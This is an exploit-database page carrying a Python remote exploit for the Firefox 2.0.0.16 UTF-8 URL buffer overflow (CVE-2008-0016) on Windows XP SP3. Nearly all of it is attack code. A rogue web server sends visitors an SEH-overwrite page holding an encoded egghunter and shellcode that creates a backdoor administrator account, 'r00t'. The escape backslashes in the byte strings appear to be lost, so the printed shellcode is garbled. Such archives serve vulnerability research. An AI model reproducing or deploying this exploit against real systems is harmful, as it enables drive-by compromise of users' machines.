Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit
# Published : 2009-09-14
# Author : dmc
# Previous Title : IPSwitch IMAP Server <= 9.20 Remote Buffer Overflow Exploit
# Next Title : Kolibri+ Webserver 2 Remote Source Code Disclosure Vulnerability

#!/usr/bin/python
# FireFox 2.0.0.16 Windows XP SP3 x86 Remote Exploit
# Author: Dominic Chell <dmc@deadbeef.co.uk>
#
# Exploits the UTF-8 URL overflow vulnerability described in CVE-2008-0016.
# As of September 2009 there are no public exploits for this vulnerability.
# However, according to securityfocus an exploit is available in both Canvas
# and Core Impact.
#
# Thanks to meta and ChrisA

from BaseHTTPServer import HTTPServer 
from BaseHTTPServer import BaseHTTPRequestHandler 
import sys 

# Adduser shellcode encoded with shikata_ga_nai
# USER=r00t PASS=r00tr00t!!
egg = (
	"xdaxd4x29xc9xb8xb3xfex8bx54xd9x74x24xf4xb1x32"
	"x5fx83xefxfcx31x47x14x03x47xa7x1cx7exa8x2fxa4"
	"x81x51xafxaexc7x6dx24xccxc2xf5x3bxc2x46x4ax23"
	"x97x06x75x52x4cxf1xfex60x19x03xefxb9xddx9dx43"
	"x3dx1dxe9x9cxfcx54x1fxa2x3cx83xd4x9fx94x70x11"
	"x95xf1xf2x46x71xf8xefx1fxf2xf6xa4x54x5bx1ax3a"
	"x80xefx3exb7x57x1bxb7x9bx73xdfx04x7cx4dx29xea"
	"xd5xc9x5exacxe9x9ax21x3cx81xedxbdx91x1ex65xb6"
	"x60xd8xf5x06x18x49x92x76x56x6dx3dx1fxfex90x4b"
	"xd1xa9x93xabx8dx38x08x1ax37xbaxb5x42x98x59x16"
	"xedx83xe9x76x84x38x74x05x46xcdx46xd9xf2x11xd4"
	"x29xcbx25x6ax7ax1bxb2xabx5bx7bx15xeaxdfx3fx49"
	"xcaxf9x9fxe7x77x72xc0x9bx18x19x61x08x81xafx0e"
	"xa5x3dx70x90x21xd0x19x7cxc3x59xaexf2x72xe9x21"
	"x81x07x31xccx55xd8x45x10xb9x59xe1x14xc5x53")

# Egghunter where egg is 0x41424142.
# The egghunter is encoded as HTML entities, this evades the unicode conversion.
# Egghunter courtesy of skape. Modified to xor edx,edx as first instruction.
shellcode = (
	"&#xD233;&#x9090;&#x9090;&#x4290;&#x6a52;&#x5802;&#x2ecd;"
	"&#x053c;&#x745a;&#xb8ef;&#x4142;&#x4142;&#xfa8b;&#x75af;"
	"&#xafea;&#xe775;&#xe7ff;&#xcccc;&#xcccc;&#xcccc;&#xcccc;"
	"&#xcccc;&#xcccc;&#xcccc;&#xcccc;")

# The UTF-8 character in the URL triggers the code path where the overflow occurs.
s = "xC3xBA"
u = unicode(s, "utf-8")
utf8chars = u.encode( "utf-8" )

class myRequestHandler(BaseHTTPRequestHandler):

	def create_exploit_buffer(self):
		html = "<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />n<html>n<body>n"

		# Store the egg and adduser shellcode in CDATA
		# The egghunter will try and find this in memory
		html += "<!CDATA[" + "x42x41x42x41x42x41x42x41" + egg
		html += "]>n"

		html += "<a href=""
		html += "x01"
		html += "xx://dmc"
		html += utf8chars
		html += "/"
		
		html += "&#x9090;" * 1700	# Windows XP SP3 SEH offset
		html += "&#4331;&#37008;"	# unicode - ptr to next seh "xebx10x90x90";
		html += "&#x11e7;&#x6037;"	# 0x603711e7 - pop/pop/ret - xpcom_core.dll
		html +="&#x9090;" * 10
		html += shellcode # add egghunter
		html +="&#x9090;" * 10
		html += "" >s</a>"
		html += "n</body>"
		html += "n</html>"
	
		return html

	def do_GET(self):
		self.printCustomHTTPResponse(200)
		if self.path == "/":
			target=self.client_address[0]
			html = self.create_exploit_buffer()
			self.wfile.write(html)
			print "[*] Evil payload sentn[*] Wait a few minutes and try connecting with r00t/r00tr00t!!n"
			
	def printCustomHTTPResponse(self, respcode):
		self.send_response(respcode)
		self.send_header("Content-type", "text/html")
		self.send_header("Server", "myRequestHandler")
		self.end_headers()

print "FireFox 2.0.0.16 x86 ExploitnAuthor: dmc@deadbeef.co.ukn"
print "[*] Starting evil web server"
print "[*] Waiting for clientsn"

httpd = HTTPServer(('', 80), myRequestHandler)

try:
	httpd.handle_request()
	httpd.serve_forever() 
except KeyboardInterrupt:
	print "nn[*] Interupt caught, exiting.nn"
	sys.exit(1)

# www.Syue.com [2009-09-14]